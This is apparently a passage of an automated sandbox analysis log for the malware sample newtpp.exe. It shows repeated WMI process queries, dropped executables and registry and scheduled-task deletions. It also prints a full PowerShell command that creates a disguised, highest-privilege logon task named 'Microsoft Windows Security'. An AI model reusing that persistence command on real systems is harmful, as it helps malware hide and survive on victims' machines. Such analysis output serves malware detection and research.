                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\sysnldcvmr.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: newtpp.exeReversingLabs: Detection: 81%
                  Source: newtpp.exeVirustotal: Detection: 75%
                  Source: C:\Users\user\Desktop\newtpp.exeFile read: C:\Users\user\Desktop\newtpp.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\newtpp.exe "C:\Users\user\Desktop\newtpp.exe"
                  Source: C:\Users\user\Desktop\newtpp.exeProcess created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exe
                  Source: unknownProcess created: C:\Windows\sysnldcvmr.exe "C:\Windows\sysnldcvmr.exe"
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\1224321169.exe C:\Users\user\AppData\Local\Temp\1224321169.exe
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\2736615137.exe C:\Users\user\AppData\Local\Temp\2736615137.exe
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\204078699.exe C:\Users\user\AppData\Local\Temp\204078699.exe
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeProcess created: C:\Users\user\AppData\Local\Temp\1088610392.exe C:\Users\user\AppData\Local\Temp\1088610392.exe
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\191563587.exe C:\Users\user\AppData\Local\Temp\191563587.exe
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                  Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\newtpp.exeProcess created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exeJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\1224321169.exe C:\Users\user\AppData\Local\Temp\1224321169.exeJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\2736615137.exe C:\Users\user\AppData\Local\Temp\2736615137.exeJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\204078699.exe C:\Users\user\AppData\Local\Temp\204078699.exeJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeProcess created: C:\Users\user\AppData\Local\Temp\191563587.exe C:\Users\user\AppData\Local\Temp\191563587.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeProcess created: C:\Users\user\AppData\Local\Temp\1088610392.exe C:\Users\user\AppData\Local\Temp\1088610392.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1088610392.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
